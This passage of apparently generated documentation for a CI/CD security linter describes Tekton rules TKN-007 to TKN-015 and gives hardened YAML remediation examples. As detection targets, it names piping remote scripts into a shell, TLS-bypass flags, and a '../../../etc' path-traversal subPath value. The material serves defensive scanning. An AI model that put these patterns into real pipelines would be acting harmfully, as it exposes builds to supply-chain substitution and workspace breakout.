Recommendation. Set spec.serviceAccountName on every TaskRun and PipelineRun to a least-privilege ServiceAccount that carries only the secrets and RBAC the run actually needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for build pods.
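A minimal sketch with a hypothetical least-privilege ServiceAccount (build-bot):

```yaml
apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: build-run
spec:
  serviceAccountName: build-bot   # dedicated least-privilege SA, never `default`
  taskRef:
    name: build
```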

Source: TKN-007 in the Tekton provider.

TKN-008: Tekton step script pipes remote install or disables TLS HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Uses the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes so detection is consistent with the GHA / GitLab / CircleCI / Cloud Build providers.

Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the step image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the step runs.
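A download-then-verify-then-execute step, sketched with a hypothetical URL and a checksum placeholder:

```yaml
steps:
  - name: install-tool
    image: docker.io/library/alpine@sha256:<digest>
    script: |
      #!/bin/sh
      set -eu
      wget -q -O install.sh https://example.com/install.sh
      # Refuse to run anything whose checksum doesn't match the pinned value.
      echo "<expected-sha256>  install.sh" | sha256sum -c -
      sh install.sh
```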

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: TKN-008 in the Tekton provider.

TKN-009: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Detection mirrors GHA-006 / BK-009 / CC-006: the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in the Task / Pipeline document. The rule only fires on artifact-producing Tasks (those that invoke docker build / docker push / buildah / kaniko / helm upgrade / aws s3 sync / etc.), so lint-only Tasks don't trip it.

Recommendation. Add a signing step to the Task: either a dedicated cosign sign step after the build, or a reference to the official cosign Tekton catalog Task. The Task should sign by digest (cosign sign --yes <repo>@sha256:<digest>) so a re-pushed tag can't bypass the signature.
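A dedicated signing step, sketched with hypothetical repo and digest parameters supplied by the build:

```yaml
steps:
  - name: sign
    image: gcr.io/projectsigstore/cosign@sha256:<digest>
    script: |
      #!/bin/sh
      # Sign by digest so a re-pushed tag can't bypass the signature.
      cosign sign --yes "$(params.repo)@$(params.digest)"
```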

Source: TKN-009 in the Tekton provider.

TKN-010: No SBOM generated for build artifacts MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer "did this CVE ship?" for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Tasks.

Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > $(workspaces.output.path)/sbom.json runs in the official syft Tekton catalog Task. cyclonedx-cli and cdxgen are alternatives. Publish the SBOM as a Workspace result so downstream Tasks can consume it.
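An SBOM-generation step wired to an output workspace; the image-ref parameter and workspace name are hypothetical:

```yaml
steps:
  - name: generate-sbom
    image: docker.io/anchore/syft@sha256:<digest>
    script: |
      #!/bin/sh
      # CycloneDX SBOM written into the output workspace for downstream Tasks.
      syft "$(params.image-ref)" -o cyclonedx-json > "$(workspaces.output.path)/sbom.json"
```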

Source: TKN-010 in the Tekton provider.

TKN-011: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Tekton Chains is the Tekton-native answer: once enabled on the cluster, every TaskRun's outputs are signed and attested without per-Task wiring. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance, witness run). Tasks produced by tekton-chains pass on the cosign attest match.

Recommendation. After the build step, run cosign attest --predicate slsa.json --type slsaprovenance <ref> (or use the tekton-chains controller, which signs and attests every TaskRun automatically when configured). Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.

Source: TKN-011 in the Tekton provider.

TKN-012: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM: it answers "does this artifact ship a known CVE?" rather than "can we verify what it is?". Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec, dependency-check. Walks every Task / Pipeline / *Run document; passes if any document includes a scanner reference.

Recommendation. Add a vulnerability scanner step. trivy fs $(workspaces.src.path) for source / filesystem; trivy image <ref> for container images. The official Tekton catalog ships trivy-scanner and grype-scanner Tasks if you'd rather reference one. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
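A scanning step that fails the run on serious findings; the image-ref parameter is hypothetical:

```yaml
steps:
  - name: vuln-scan
    image: docker.io/aquasec/trivy@sha256:<digest>
    script: |
      #!/bin/sh
      # Non-zero exit on HIGH/CRITICAL findings fails the TaskRun.
      trivy image --exit-code 1 --severity HIGH,CRITICAL "$(params.image-ref)"
```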

Source: TKN-012 in the Tekton provider.

TKN-013: Tekton sidecar runs privileged or as root HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. TKN-002 hardens the spec.steps list. Tekton's spec.sidecars list runs alongside the steps in the same pod, but a sidecar's container image and command come from a separate place in the manifest, so a Task with hardened steps and a privileged sidecar (a common pattern when wrapping docker:dind) leaves the same kernel-namespace gap TKN-002 was meant to close. The detection mirrors TKN-002: fires on a sidecar with securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all.

Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every sidecar in spec.sidecars. A privileged sidecar is the same escape vector as a privileged step: it shares the pod's network and kernel namespaces, and a compromised sidecar image owns the entire TaskRun's execution surface.

Known false positives.

  • Tasks that genuinely need docker:dind as a sidecar, e.g. building images inside the cluster without giving the step itself host-Docker access. The replacement pattern is Kaniko or BuildKit running as the step itself, with no privileged sidecar; if neither is viable, ignore TKN-013 in .pipeline-check-ignore.yml for the affected Task.

Source: TKN-013 in the Tekton provider.

TKN-014: Tekton step script runs unpinned package install MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. Same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket / Azure DevOps / Jenkins / CircleCI / Cloud Build / Buildkite / Drone. Tekton was a gap; this closes it. Only Task and ClusterTask documents are scanned because that's where Tekton step scripts live.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. npm ci (not npm install), yarn install --frozen-lockfile, pip install -r requirements.txt --require-hashes, bundle install --frozen. Don't use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (TKN-008 covers the TLS subset; this rule covers the lockfile subset).

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific step name.

Source: TKN-014 in the Tekton provider.

TKN-015: Workspace subPath interpolates a Task parameter (path traversal) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-5 Insufficient PBAC.

How this is detected. Tekton's $(params.x) substitution is performed on every string field of the resolved TaskRun body, including a step-level workspace binding's subPath. TKN-003 catches the same parameter being interpolated into a step's script body; TKN-015 catches the complementary file-system breakout vector that script-only detection misses: the value never appears in a shell command, only in the volume-mount config.

The detection scans the step-level workspaces: list (spec.steps[*].workspaces[*].subPath) for any $(params.<name>) reference. $(workspaces.x.path) expansions are unaffected because those are not pusher-controlled.

Recommendation. Pin every workspace subPath: to a static literal that your team controls. subPath: build/output is fine; subPath: $(params.target_dir) is not, because a parameter-driven sub-path lets an attacker break out of the workspace and write into a sibling directory of the shared volume. Tekton resolves $(params.x) substitution in workspace bindings before the volume mount happens, so ../../../etc lands as a real path. If you genuinely need a runtime-chosen sub-path, sanitise the parameter with a step-level pre-check (match it against an allow-list, reject anything containing ..) and pass the validated value through a result rather than the raw parameter.
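The safe and unsafe shapes side by side, assuming the step-level workspace binding form this rule scans:

```yaml
steps:
  - name: write-output
    image: docker.io/library/alpine@sha256:<digest>
    workspaces:
      - name: shared
        subPath: build/output            # static literal the team controls
        # subPath: $(params.target_dir)  <- parameter-driven; this is what TKN-015 flags
```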

Known false positives.

  • Some teams use a parameter to select between a small set of allowed sub-paths and rely on a step pre-check to reject anything off-list. The rule has no way to see that pre-check; suppress on the specific step name when this is the deliberate shape.

Source: TKN-015 in the Tekton provider.


This page is generated. Edit pipeline_check/core/standards/data/owasp_cicd_top_10.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py owasp_cicd_top_10.